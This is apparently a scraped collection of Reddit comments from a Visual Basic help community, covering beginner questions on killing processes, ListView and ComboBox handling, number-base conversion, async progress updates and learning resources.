 Imports System.Diagnostics and then include Process.GetProcessesByName("INSERT NAME HERE")(0).Kill() instead of Process Kill.
http://prntscr.com/hwniad Getting this error
oh, not sure if that will work with this since its a autohotkey file
Try this: public bool FindAndKillProcess(string name) { //here we're going to get a list of all running processes on //the computer foreach (Process clsProcess in Process.GetProcesses()) { //now we're going to see if any of the running processes //match the currently running processes by using the StartsWith Method, //this prevents us from incluing the .EXE for the process we're looking for. //. Be sure to not //add the .exe to the name you provide, i.e: NOTEPAD, //not NOTEPAD.EXE or false is always returned even if //notepad is running if (clsProcess.ProcessName.StartsWith(name)) { //since we found the proccess we now need to use the //Kill Method to kill the process. Remember, if you have //the process running more than once, say IE open 4 //times the loop thr way it is now will close all 4, //if you want it to just close the first one it finds //then add a return; after the Kill try { clsProcess.Kill(); } catch { return false; } //process killed, return true return true; } } //process not found, return false return false; } 
Try this: /// &lt;summary&gt; /// Kills Processes By Name /// &lt;/summary&gt; /// &lt;param name="names"&gt;List of Process Names&lt;/param&gt; private void killProcesses(List&lt;string&gt; names) { var processes = new List&lt;Process&gt;(); foreach (var name in names) processes.AddRange(Process.GetProcessesByName(name).ToList()); foreach (Process p in processes) { try { p.Kill(); p.WaitForExit(); } catch (Exception ex) { // Logging RunProcess.insertFeedback("Clean Processes Failed", ex); } } } This is how i called it then: killProcesses((new List&lt;string&gt;() { "winword", "excel" }));
You'll need to kill the ahk process itself. So, when you run the file check task manager and see which .exe starts. I think probably ahk.exe or autohotkey.exe Alternatively, ahk might give you a way to stop the script. I think they have an api or command line arguments?
Out of curiosity, do you have a process for selecting Stack Overflow content for inclusion? How often do you update and add to these 'books'? Did you assemble all of these yourself?
Thanks. I looked into that but unfortunately there's an associated cost and there's still the potential delays of email.
I meant IfTTT to SMS.
This is what I have right now, but it throws an error saying "Object reference not set to an instance of an object." For Each pic In picTank For index As Integer = 0 To (BoomerangCount) If pic.Bounds.IntersectsWith(Boomerang(index).Bounds) Then pic.Hide() End If Next Next
Your code should do fine for your purpose, the error thrown is probably because some picturebox in the Bommerang array containing pictureboxes(?) does not carry an instance of such at some point. Maybe the inner loop should only go to BoomerangCount - 1?
If you don't mind, could you take a look at the code where I create boomerangcount? Dim BoomerangCount As Integer = -1 Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click If PlaceBoomerangTurret = True Then BoomerangCount = BoomerangCount + 1 ReDim Preserve BoomerangTurret(BoomerangCount) BoomerangTurret(BoomerangCount) = New PictureBox BoomerangTurret(BoomerangCount).Size = Button2.Size BoomerangTurret(BoomerangCount).Location = Button2.Location BoomerangTurret(BoomerangCount).BackgroundImage = Image.FromFile("E:\Visual Basic\FinalISU\FinalISU\Resources\coloured-tank-w-gun.png") Controls.Add(BoomerangTurret(BoomerangCount)) BoomerangTurret(BoomerangCount).BackColor = Color.Transparent BoomerangTurret(BoomerangCount).BackgroundImageLayout = ImageLayout.Zoom BoomerangTurret(BoomerangCount).Show() Button2.Hide() Button2.Enabled = False End If basically what's happening here is I create a boomerangturret on the buttonclick and use boomerangcount as placeholder for 0 (as in the first variable for an array) and boomerangcount will increase every time you press another button. Can you see if there's an error here?
Your ping should be returning a PingReply which will give you more information about the status of the pinged device. Try reading over the MSDN section on Ping and PingReply. 
Seems to be about right, even though you use your boomerangCount unintuitively. You have to debug your code by setting a breakpoint at the first loop For Each pic In picTank and go through the loops in single steps to see in which cycle your error occurs (and also see which values your variables currently hold). But only you can do that; if you don't know how to do that I highly suggest you look into debugging with breakpoints that you will need for every program in the future anyways.
My first thought is: You're in hell. I use the NuGet package Json.NET from Newtonsoft.Json https://www.newtonsoft.com/json Work that into your project first and get to a point where you're opening the file, reading it in and parsing it using that. Also, this is a really helpful site to build .NET classes out of Json text. https://jsonutils.com/ 
Try searching through www.vbforums.com. Most of my VB use is basic data manipulation, but vbforums saved me a few times. 
Thanks, the try block worked after a lot of tweaking Lowering the ping timeout might be something to think about, but one of the servers off site (multi site org) has a terrible net connection. i was watching it today and the ping was jumping from 5ms up to 1000ms... Thanks anywhoo :), its sort of working now 
Could you have it check the day of week, and only run the rest of the macro if today is one of those six days?
I don't know- I'm in this strange scenario where I know Java and C++ well, but VBA not at all, and have been scraping together bits of code to try to get it to work. What I currently have is (Since the computer that has the content that needs to be emailed is sometimes manned by the less technologically proficient) is a shortcut icon on the desktop that says "Click me to start the hourly emails" When clicked on, it starts a macro that sends 24 emails, 1 per hour, and then in 24 hours, restarts itself. I'm wondering if there is a way to have it do either of the following, but both would be nice- - Start itself automatically on Sunday at 5:30 - Stop itself on Friday at 5:30. 
Is this in VBA or VB.NRT?
What picture? What have you tried already? 
Post code, not photo
I bought Beginning Visual Basic 2015 at the end of April and was writing a general windows program that pulls information from a database, runs reports, performs pricing calculations and replaced multiple spreadsheets in about 3 weeks. This was done basically spending a couples hours most nights working on it. Once I understood how most of the basics work, it was pretty easy to expand on that. 
So that's a book right? What about web tutorials or youtube videos? Have you used some that you have preference?
Do you have any channel of youtube you think is best explaining the core stuff to beginners? I mean, i already know basic stuff like dimensioning variables and using many mathematical built in functions, or using if, do, for, etc. I need something that teach me how to use this knowledge on some practical applications
As far as videos/sites, you have to pay (though I think there’s a trial?), Lynda.com. If you haven’t heard of it, it covers a TON of topics regarding computer languages and programs. My school used it and I made an account after college and it’s always served me well; very detailed, professional, and covers programs/languages basically the whole way through. As far as learning VBA, I don’t have it as a stand alone and haven’t tried learning it outside of Office programs, but I’d enable the developer tab in Excel, hit record macro, change a couple things in the workbook/sheet and study how it writes the code. You can open the editor by pressing alt+F11, and even leave it open and watch how it records changes in real time (it obviously won’t write loops or anything super specific this way, but should give you a basic idea of how objects/variables are handled). One website that I’ve been reading through (again, more geared to Excel) is [excelmastery.com](https://excelmacromastery.com); Also very detailed and covers a lot of the essentials that will likely carry over to the standalone Visual Basic.
I have used very few videos. Once I had the basic understanding of properties and using stackexchange.com for some help, things move pretty quick. I would use those resources and use what I saw and really work to understand it. As you repeatedly need certain functions, you will remember them. What really helped me was I had a specific goal in mind. I work at a place where our ERP system doesn't give all the information we need on one report and we also used many excel sheets that took a lot of time moving information in and out of them. So I wrote a program that eliminated all those sheets and gave us all our information quickly and easily. 
Thank you for your information, especially about Lynda and excelmastery, i'm gonna give it a try!
This subreddit is very helpful with code as well. The key is that you actually try to code something and share the code here. We'll even help with assignments for school as long as you give the effort. Good luck and have fun!
I started with VB 2.0 and have moved to C#, so specific channel or videos are not something I can state. I'm glad that you have modified your statement to be more specific as it allows me to give you a better answer. .NET, like any language or platform, is large and can do some much. So "Core" can mean many things. Because a language can build so many things, for example I have build desktop, server, web, mobile and vr using .net, I have long told people that what I have done, and continue to do is to build something. Find a need that YOU have and build it. During that process you will find out so much about a language and it's abilities (or lack thereof) as well as yours. Start with a specification, list EVERYTHING you want an application to do and the priorities for each of the abilities. I know all of this is not what you asked, but it is the path that you need (I believe) as so many developers are working on a language but forget that the users are the primary issue. Insuring that you get their needs FIRST and then let the technology handle those needs, as opposed to saying; "I want to learn a language/technology" VB is kinda old at this point, and I say this as someone who used it for a LONG time. I am not saying to not learn it, only to allow the need for a product/solution to drive you to whatever tools you need to learn. Hope that helps
Create a new post with the code and what problem you have. We can help. 
Thanks i don't have the code right now and I'm studying another subject. When i go back to VB and post the code is there a way I can tag you in it?
I believe just use /u/marcmiller2007 in the post. 
If it's VB.net you could go to [Microsoft's MVA](https://mva.microsoft.com/) and where it says 'Search all courses' just put in 'Visual Basic' and search, you don't get useful results if you just put in 'vb'. The Fundamentals course at the start of the list covers the essentials including installation.
Thank you very much!
Hobby tracker. College assignment manager. Stargazing catalogue. what can I cook with whats in my fridge app.
I wrote one to keep track of serial numbers of different products (computer parts), and then what computer they are built into. a Program to track business appointments and locations. A program to track packages that you are expecting. A program to track your collection of CDs, movies. Stamp or coin collections (with pictures) an address book. 
I know selection sort is faster and more efficient, but teacher asked us what's the advantage of bubble sort over selection sort? I don't know the answer to that.
The most important thing in all sorts is speed, Selection sort is faster in most cases, thus superior given a random data set. To be fair certain sorts are better for different types of data. In most cases the quick sort is the fastest of all sorts.
The bubble sort advantageous when data moves are cheap in processing power but comparisons are not.
Most VB courses require winforms to do projects. As far as I know, you can't use winforms on jetbrains rider.
Visual Studio does run on MAC. I've used it for projects using C#. The MAC version just doesn't support VB.
Yeah that was the blockade I was worried about. Thanks for the answer!
Quit splitting hairs, you knew what I meant.
As far as I know, bubble sort is cheaper on processor time for small data sets than the selection sort. But when you've got bigger data sets, the selection sort is more processor intensive, but faster overall. Check out [Kevin Drumm's](https://www.youtube.com/watch?v=gaC4MKqn41g&amp;list=PLTd6ceoshprcXjTkoI9_6zev-yU04vol1) explanations of the inner workings of various sort methods for more information.
Your point of contact is here -----&gt; reddit, master language.
This may be the least VB question I've ever seen posted in /r/visualbasic
What exactly do you mean that systemcolors has been unsupported for years? What type of project are you writing? UWP? WPF? WinForms?
in the system.drawing namespace there is a class dedicated to retrieving the system colours. https://msdn.microsoft.com/en-us/library/system.drawing.systemcolors.aspx Me.BackColor = SystemColors.Desktop 
Your method does not work, it returns the incorrect color. My current theme is '24, 24, 24', SystemColors.Desktop returns 'Black'. And I don't want the desktop color, I want the ActiveCaption/Titlebar which returns a light blue when using SystemColors.ActiveCaption.
If you're using WPF or willing to reference PresentationFramework, you can use [SystemParameters.WindowGlassColor](https://docs.microsoft.com/de-de/dotnet/api/system.windows.systemparameters.windowglasscolor). Otherwise you can pinvoke [DwmGetColorizationColor](https://msdn.microsoft.com/en-us/library/windows/desktop/aa969513%28v=vs.85%29.aspx).
You give us a photo of your monitor? Really? Not even a screenshot? Copy the code and paste it here with right formatting next time. Your shown code does not return values since it is a Sub, so I have no idea what you are talking about and I'm sorry, but I'm not here to guess your problem, so please try again and put a little effort into it.
You're not accumulating the scores, newscore is always overwritten by tempscore. maybe some thing like this in your loop? guessing. newscore += tempscore
All that stuff in the Output window, the "thread ___ has exited with code 259" and "program ___ has exited with code 0" has nothing to do with the values in the variables in your program. As a very, very simplified explanation of how programs execute -- every program is basically a function. As such, every program needs to return a value to inform the OS or calling program whether it completed successfully or not. Programs use integer codes to do this, with a code of 0 meaning it executed and completed successfully. That's what you're seeing in the Output window at the bottom. As to your code itself, I see a few questionable things. First, why are you displaying an InputBox (the line `InputBox(prompt, title)`) without doing anything with the return value? Then the next line you display another InputBox and store the return value... replace those two lines with `Dim tempscore As String = InputBox(prompt, title)`. Next, you never actually do anything with the values you're gathering. You have 2 variables that are available outside the scope of `btnScores_Click`, `numberofscores` and 'sumofscores`, but you're only every incrementing `numberofscores`. It looks like you want to be adding each input to `sumofscores` as well. Either way, you still don't ever actually do anything with them. Should you be updating a Label or TextBox or something on the form with their values?
I was able to figure out the problem, I didn’t do anything with the number the user enters because I got this bug and I wanted to fix it before having more code in the mix thanks for your explanation though! 
I figured it out thanks!!!
Number 5 and 6 are confusing. Why can't you use IIS? It's perfectly suited for you're trying to do. I've been working on Web service for about a year now, complete with IIS web gardening. https://msdn.microsoft.com/en-us/library/bb386386.aspx 
How are you getting the user information? Are you trying to pull in the current user ldap or are you making them type their user in? Everything must match up. Especially if you made sure the code is checking things on a case sensitive level. 
I have a separate form with all of the text boxes to add the info. It works on the view page that I have but not the login
Please provide the code you're struggling with. What context do you mean by "using a structure" please? Is there a back end you're trying to log into.. etc etc etc Basically... you need to provide more info. it's like guessing the length of a piece of elastic otherwise. Cheers buddy. 
 most ppl with image just upload them to an img sharing site like imgur.. then post the link on reddit using the chain icon (link). there's probably better ways. it's not really very good to make further posts about the same thing. imagine somebodyemailing you , but never using the reply button. the whole thread is spread across many different posts. .. gets confusing. :/ 
As far as your code goes, the only problem I see is you are creating an arraylist, adding 1,2,3,4 to it, and then you are looping 0-4 (5 loops), but there are only 4 items to add. I don't know if you typed that code or copy/pasted it, so maybe you just left something out there, as you are also missing a closing ) on your combobox1.items.add call which would give you a syntax error. Can we assume you have some code in some combobox events like selectedindexchanged events? Could it be that these events are being triggered prior to you actually loading these comoboxes with data?
That we a typo here. I have 5 items in the box, loop through to add the 5, then pick 0 -4 I have no code on the box itself. I've tried adding: Threading.thread.sleep(500) before the random.next that gets the error. While it seems to make it occurre less, it's still coming up
Do you have code in combobox events like selectedindexchanged?
None The other combo boxes I have use similar random selection, though I've manually entered thier contents since they are not as dynamic, so I use random.next(0,combobox.count). I tried changing this one too the same 0,.count format, but still error
What specific line of code is throwing the indexoutofrange exception?
Well, I'm wrong. I just looked at [the documentation](https://msdn.microsoft.com/en-us/library/2dx6wyd4(v=vs.110).aspx) and saw this statement &gt; A 32-bit signed integer greater than or equal to minValue and **less** than maxValue 20 years using Visual Studio and I always thought it was equal to and less, not just less. Ooops 
Yes the max value you specific is exclusive, not inclusive of that specified number. That said there is no reason at all that this code would ever fail: Combobox1.SelectedIndex = random.next(0,5) if combobox1 actually has 5 items in it. The most logical explanation is that the combobox1 does not actually have 5 items currently loaded in it. OP, when the exception is hit, and the IDE brings you to that line of code highlighted in yellow, go to the immediate window (should be at the bottom of the IDE, but if it is not visible then find it under debug -&gt; windows -&gt; immediate) In the immediate window, type this and hit enter: ?combobox1.Items.Count what number does it give you?
I will do that when I get home and check. A theory I had was, since it's deciding what is in the combo box in the same action (button press) that the code is executing before the box gets filled. Like, on the button press it's randomly decides what's in choicesCombobox, then based on choices.selecteditem it populates resultsCombobox, then randomly selects the result choice. Can the code be executing a nanosecond before the box populates? This, even though it's being filled with 5 items, when it runs it only had 2 , and if it tried to select the 3rd there is an error. This error will only ever happen on an initial button press, never subsequent
The subroutine in the button press is generally all linear blocking calls. Meaning each line is executed and the next line is not executed until the previous line has finished. So this should not be any sort of race condition where something is not happening fast enough for the next line of code to be executed properly. Worst case, if you want to upload the project we could find out the exact issue.
Must be. For some reason in your combobox isn't populated, or was and then was cleared before you call the offending code
Possible reason detected. In my population loop I was clearing the combobox so it looked something like If choiceComboBox.SelectedItem = "A" Then resultsComboBox.Clear For i as int = 0 to 4 resultbox.Item.Add(ResultStringA(i) next end if Its the only possible thing I could see resulting in an empty box. Stupid question, but can I just append a combobox item? I was clearing it because I didn't want the old items to get left behind.
Can you post your code?
yes thanks for replying code: input "enter full name "; n$ let c =1 [loop] let l$ = mid$(n$,c,1) if l$= " " then goto [cont] let c = c+1 goto[loop] [cont] print left$(n$,1);".";mid$(n$,c+1,1) goto[end] [end] end 
Do not use GOTO. Easiest way would be to split the input string using space and take first 1 char from each string. You can loop through the string with something like: For i As Integer = 0 To n%.Length mid$(n$, i, 1) Next
Than you soo much 
Easier: Read the name into a string: n$="John Q. Public" , then split it into a string array with Split at the spaces: nameParts$=Split(n$, " ") Then pick off the first character of each member of the array.
/r/math will probably be more helpful than here, but I'm guessing derivatives applied somehow...
use task scheduler 
Task scheduler refuses to run after a recent security update. I can post the logs if requested. 
So looking at the code, If txtHours.Text &gt; 40 Then decOvertime = decPay * (decHours - 40) * cdecOvertime why are you checking txtHours.text rather than decHours? I don't use studio 2017 but in my version, a .text is a string and not a numeric value. Maybe that changed, since many programming languages do that kind of thing now, but i'd try looking at the decHours value rather than the txthours.text and see what that does.
ok so I change it, but still am getting the same amount. The output is $525.00 when putting in 45 hours at $10 pay. It should come out to $475.00
so I would put a break at line 36 and then step through and make sure it's going to the right branch, and then if it does look at each of the values and see that they are correct. 
so it looks like line 38 is still trying to pull cdecOvertime? its the only thing that looks odd to me. (plus i have never used breaks or steps so that was really fun to use)
It's a pretty useful debugging tool. 
A simple way might be to add the differences between each number. If the sum of the differences is greater than zero, then the sequence is generally increasing, if it's less than zero then it is decreasing. 
That's an interesting idea - this would account negatives too by the looks of things. Thank you!
In fact, I've just tested this in an Excel sheet and it works flawlessly. Thank you.
Mostly I recorded macros. I was already competent enough creating VB applications and VBA excel macros that my stumbling blocks were mostly related to Microstation. I had some materials I'd received when I took a class at Bentley that helped a little, but didn't have much else to go on.
You don't scan website directories, they send you an HTML-formatted listing if there is no index page. This format is not standardized. You just send an HTTP GET request to a folder and have to parse out all the A HREFs
I recommend you take the time to research the [PictureBox class](https://msdn.microsoft.com/en-us/library/system.windows.forms.picturebox(v=vs.110).aspx) and [Label class](https://msdn.microsoft.com/en-us/library/system.windows.forms.label(v=vs.110).aspx) properties before asking the community a simple question. Simple questions show us you don't have the true will or urge to learn the language. Assuming you already know how to create events, modifying controls at runtime is very simple. `PictureBox.Image = *your image*` Or `PictureBox.BackgroundImage = *your image*` If the images you are trying to reference are outside of the project you'll want to use: `PictureBox.Image = Image.FromFile(*"your image path*)` Or `PictureBox.Image = Image.FromFile (*"your image path"*)` The difference between Image and BackgroundImage is their layer visibility. A background image will always render below the main image, hence the name. &gt;how to set it to default As far as that goes, you can't. Once you make a change to a controls properties at runtime the previous values they had are no longer existing. You'll need to define those *default properties* in your code or create a custom control which is pointless in your current situation.
ListView1.Items.Add("This Item")
try `set colSMBIOS = Nothing` maybe also check something in the objWMIService object to see if it found a valid system and work off that.
Your problem is `On Error Resume Next`, which goes to the *next line* after the error, not the next loop iteration. You need to either manually check the `Err` object to see if an error occurred, or use `On Error Goto &lt;line&gt;` instead. I don't remember the exact syntax, I'm sure Google can help.
It gets a little weird with multiple columns. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load Dim li As ListViewItem ListView1.Columns.Add("A") ListView1.Columns.Add("B") ListView1.Columns.Add("C") ListView1.Columns.Add("D") li = ListView1.Items.Add("Hello 1") li.SubItems.AddRange({"1", "2", "3"}) 'or li = ListView1.Items.Add("Hello 2") li.SubItems.Add("1") li.SubItems.Add("2") li.SubItems.Add("3") End Sub 
I don't use .Enter, I use **.SelectedIndexChanged**. Private Sub TabControl1_SelectedIndexChanged(sender As Object, e As System.EventArgs) Handles TabControl1.SelectedIndexChanged Dim TC As TabControl = sender Me.Cursor = Cursors.WaitCursor Select Case TC.SelectedTab.Name Case Is = "celula_tab" celula_update() Case Is = "tab2" Case Is = "tab3" End Select Me.Cursor = Cursors.Default End Sub 
When I use 'Set colSMBIOS = Nothing' I'm still getting the last good server's serial number, so that collection still seems to be retaining the previous value. I'll look into the objWMIService object for more info.
I think it's something like ListView1.Items(&lt;row&gt;).SubItems(&lt;column&gt;).Value
Ah! The answer was found by /u/MichaelCrave on /r/vbscript: https://www.reddit.com/r/vbscript/comments/7swg2j/looking_for_assistance_with_a_serialnumber/dt8lusg/ Thanks for the suggestions here!
That is always the best place to start. Post the code and we can take a look. 
Thanks man, it worked. Cheers! :)
 Hi sorry for the slow reply this is what I have written so far. AS you you see im not the greatest at visual basic. Module Module1 Dim answer1 As String Dim asktheaudiencechance As Boolean Dim phoneafriendchance As Boolean Dim fiftyfiftychance As Boolean Dim xyz As String Dim money As Integer Dim mystring As String Sub Main() asktheaudiencechance = True phoneafriendchance = True fiftyfiftychance = True Dim menuSelect As String money = 0 Console.Clear() Console.WriteLine("Wants to be a millionaire?") Console.WriteLine() Console.WriteLine("Start (p)") Console.WriteLine() Console.WriteLine("Help(h)") Console.WriteLine() Console.WriteLine("Quit(q)") Console.WriteLine() menuSelect = Console.ReadLine menuSelect = UCase(menuSelect) Select Case menuSelect Case "P" PlayGame() Case "H" ShowHelp() Case "Q" QuitGame() Case Else Console.WriteLine("please enter p, q or h ") End Select Console.ReadLine() End Sub Sub PlayGame() Console.Clear() Console.WriteLine("Welcome to Who wants to be a millionaire") Console.WriteLine() q1() End Sub Sub q1() Console.WriteLine("if at any time you wish to use a lifeline press L ") Threading.Thread.Sleep(500) Console.WriteLine("here comes question 1...") Threading.Thread.Sleep(500) Console.WriteLine("What would you be most likley to buy from mcdonalds?" ) Threading.Thread.Sleep(500) Console.WriteLine() Console.WriteLine() Do Console.WriteLine("A. A t-shirt") Threading.Thread.Sleep(250) Console.WriteLine("B. A car ") Threading.Thread.Sleep(250) Console.WriteLine("C. A hamburger") Threading.Thread.Sleep(250) Console.WriteLine("D. A window") Threading.Thread.Sleep(555) answer1 = Console.ReadLine answer1 = UCase(answer1) Select Case answer1 Case "A" incorrect() Case "B" incorrect() Case "C" correct() q2() money = 1000 Case "D" incorrect() Case "L" lifeline() End Select 
it worked thanks man.
The listview holds ListViewItems which is basically an object that holds the values of each column for the row. In order to add to the listview, you would need to create a new listviewitem and then assign each of the text properties for the item and it's subitems your values. Example: Listview1.Columns.Add("Column1") Listview1.Columns.Add("Column2") ListView1.Columns.Add("Column3") ListView1.View = View.Details To populate a row with the information into the 3 columns you could do something like: Dim lvi as New ListViewItem lvi.Text = "This is in column1" lvi.SubItems.Add("This is in column2") lvi.SubItems.Add("This is in column3") At this point we have only created a new listviewitem and gave it 3 columns of data. In order to show this in the listview you need to add the listviewitem (lvi) to it. ListView1.Items.Add(lvi) 
You are going to want to put your questions and answers into a multi dimensional array. Dim questions(2, 6) As String questions (0, 0) = "What would you be most likley to buy from mcdonalds?" questions (0, 1) = "A. A t-shirt" questions (0, 2) = "B. A car " questions (0, 3) = "C. A hamburger" questions (0, 4) = "D. A window" questions (0, 5) = "C" questions (1, 0) = "What would you be most likley to buy from mcdonalds?" questions (1, 1) = "A. A t-shirt" questions (1, 2) = "B. A car " questions (1, 3) = "C. A hamburger" questions (1, 4) = "D. A window" questions (1, 5) = "C" In this array I have the question at 0 the potential answers at 1-4 and the correct answer in 5. You question procedure can then take in a variable which represents the question number so that you are not writing a separate procedure for each of the questions.
That's brilliant thanks so much!
 Private Sub convertbtn_Click(sender As Object, e As EventArgs) Handles convertbtn.Click Dim startvalue As Double = txtbxorginalvalue.Text Dim startbase As Integer = txtbxorginalbase.Text Dim targetbase As Integer = txtBxFinalBase.Text Dim tempconverison As String Dim total As String Try If targetbase = 2 Then 'targetbase = txtBxFinalBase.Text 'calculate the reminders between startvalue and newbase While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 8 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 10 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 16 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If Catch MsgBox("This program only converts numbers from base 10 To 2, 8, 10, 16") End Try End Sub
Public Class Form1 Private Sub convertbtn_Click(sender As Object, e As EventArgs) Handles convertbtn.Click Dim startvalue As Double = txtbxorginalvalue.Text Dim startbase As Integer = txtbxorginalbase.Text Dim targetbase As Integer = txtBxFinalBase.Text Dim tempconverison As String Dim total As String Try If targetbase = 2 Then 'targetbase = txtBxFinalBase.Text 'calculate the reminders between startvalue and newbase While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 8 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 10 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 16 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If Catch MsgBox("This program only converts numbers from base 10 To 2, 8, 10, 16") End Try End Sub
 Public Class Form1 Private Sub convertbtn_Click(sender As Object, e As EventArgs) Handles convertbtn.Click Dim startvalue As Double = txtbxorginalvalue.Text Dim startbase As Integer = txtbxorginalbase.Text Dim targetbase As Integer = txtBxFinalBase.Text Dim tempconverison As String Dim total As String Try If targetbase = 2 Then 'targetbase = txtBxFinalBase.Text 'calculate the reminders between startvalue and newbase While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 8 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 10 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 16 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If Catch MsgBox("This program only converts numbers from base 10 To 2, 8, 10, 16") End Try End Sub
Public Class Form1 Private Sub convertbtn_Click(sender As Object, e As EventArgs) Handles convertbtn.Click Dim startvalue As Double = txtbxorginalvalue.Text Dim startbase As Integer = txtbxorginalbase.Text Dim targetbase As Integer = txtBxFinalBase.Text Dim tempconverison As String Dim total As String Try If targetbase = 2 Then 'targetbase = txtBxFinalBase.Text 'calculate the reminders between startvalue and newbase While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 8 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 10 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If If targetbase = 16 Then While startvalue &gt; 0 tempconverison = startvalue Mod targetbase startvalue \= targetbase total = tempconverison + total End While MsgBox("Total =" + total) txtfinalbase.Text = total txtfinalbase.Visible = True End If Catch MsgBox("This program only converts numbers from base 10 To 2, 8, 10, 16") End Try End Sub
In .Net 4.5 or higher, it's even easier than background workers. Async/await is fantastic once you get the hang of it. 
Here's a simple example of a loading/progress bar type pattern that will perform well. It allows you to update things on the UI as you load, without blocking the thread for the entire time. Friend Class MyClass Private _lastArg As ProgressArgs Private WithEvents _timerPrgUpdate As New Windows.Forms.Timer() With {.Interval = 100} Private Async Function Initialize() as Task ' "ProgressArgs" can be any object you want. It just has to match the parameter on the handler. Dim progress As New Progress(Of ProgressArgs)(AddressOf UpdateMenuAccessRefreshHandler) Await Task.Run(Sub() MyInitializerSub(progress)) ' Do anything here to clean up after initialization and update UI End Function Private Sub MyInitializerSub(progress As IProgress(Of ProgressArgs)) ' This is a background thread that won't block the UI For i as Integer=0 to 1000 Threading.Thread.Sleep(10) progress.Report(New ProgressArgs() with {.Min=0, .Max=1000, .Value=i}) Next End Sub Private Sub UpdateMenuAccessRefreshHandler(obj As ProgressArgs) ' In this example, I don't care that the UI updates all 1000 times. ' I just care that it does it in order, and doesn't freeze the interface. ' If you DO care, simply do your updating here. This is the UI thread. _lastArg = obj _timerPrgUpdate.Start() End Sub Private Sub UpdateProgHandler() Handles _timerPrgUpdate.Tick ' Update your UI as loading progresses here. This will update the UI a mximum of 10 times per second, for performance. End Sub End Class Friend Class ProgressArgs Property Min As Integer = Int32.MinValue Property Max As Integer = Int32.MinValue Property Value As Integer = Int32.MinValue End Class
Oh, goodness, that didn't format at all on mobile... Hope you're on a desktop browser. ¯\_(ツ)_/¯ 
You dropped this \ *** ^^To ^^prevent ^^any ^^more ^^lost ^^limbs ^^throughout ^^Reddit, ^^correctly ^^escape ^^the ^^arms ^^and ^^shoulders ^^by ^^typing ^^the ^^shrug ^^as ^^`¯\\\_(ツ)_/¯`
Thanks for the help! I'll let you know if it works (and if it doesn't too)!
A google search of BC30506 error turned up several results which seems to indicate an error with the part of the line after handles, and it is looking for a variable. you probably have screwed up the handles portion.
Thanks! I reappy appriciate the guidance. 
Did you declare BtnbkgrndclrR in code, or did you drag it from the toolbox onto the form? If you had dragged it onto the form, the IDE would have automatically created the variable using the WithEvents keyword and the handles clause would work just fine. If you declared the button yourself in code, then you didn't declare it using the WithEvents keyword and that is your problem. Also, if your goal is to change the button backcolor, you need to qualify the backcolor property with the button name BtnbkgrndclrR.BackColor = Color.Red, otherwise the code assumes you are talking about the backcolor of the form itself.
Private Sub BtnbkgrndclrR_Click(sender As Object, e As EventArgs) Handles BtnbkgrndclrR.Click If me.BackColor = Color.Blue Then me.BackColor = Color.Red End Sub 
Thanks! What's the "me"? I got my code to work last night but didn't use me. Is there a benefit to that when trying other code?
Just looking at it quickly, is the mask for partnumber long enough? Also, you should look into using Select statements instead of all those elseif's.
Ty sir, i'll check it out.
Hey dude, didn't know you already solved your problem. That is weird though, didn't really had a problem with a gif missing frames. Anyways, you can edit out your gif on Photoshop or in some online editors to make it draw faster. 
Here is what I am trying to accomplish. I have a launcher/patcher app and a GUI. I have created a custom file association to the launcher. If the user opens a file of that type, the launcher opens my GUI passing the file as an Arg. If the user opens another file of this type, I do not want to start another instance. I want to *ask* the existing GUI process to open the new file (GUI has multiple Tabs). I have the first part working, I am thinking IPC is the way to go for the second part, but I have not found an example where a GUI is the server (RPC example shows that I must inherit MarshalByRefObject, but it already inherits Form).
Shared Memory is one method. I t allows you to create a structure put in a memory. You can then read the memory in your other application. https://www.codeproject.com/Articles/242386/VB-NET-MEMORY-MAPPING-ACROSS-DIFFERENT-RUNNING-APP 
